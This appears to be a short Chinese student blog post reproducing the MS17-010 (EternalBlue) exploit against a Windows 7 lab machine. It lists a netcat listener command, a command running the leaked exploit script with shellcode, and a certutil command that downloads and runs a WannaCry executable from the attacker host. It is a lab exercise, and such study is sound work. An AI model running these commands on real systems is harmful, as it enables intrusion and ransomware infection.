前言
很老的洞了,只是老师上课讲了,我就复现一遍。
开始
环境靶机为windows7
并且存在此漏洞
攻击机需要python3
环境
nc –lvp 8888
python ms17-010.py –-host 192.168.217.2 –-file shellcode
只需这两条命令,便可以利用成功,其中ms17-010.py
是NSA
泄露出来的脚本
之后我们便可以通过windows
自带的工具
certutil.exe -urlcache -split -f http://192.168.217.1/wannacry.exe wannacry.exe
写入病毒程序并且运行。
脚本不提供
总结
0.0